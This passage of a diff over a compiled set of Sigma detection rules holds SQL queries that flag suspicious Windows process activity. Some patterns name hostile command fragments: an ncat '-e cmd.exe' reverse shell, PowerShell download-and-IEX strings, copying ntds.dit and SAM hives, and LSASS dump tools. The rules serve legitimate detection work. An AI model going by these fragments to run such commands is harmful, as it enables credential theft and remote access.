'\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' 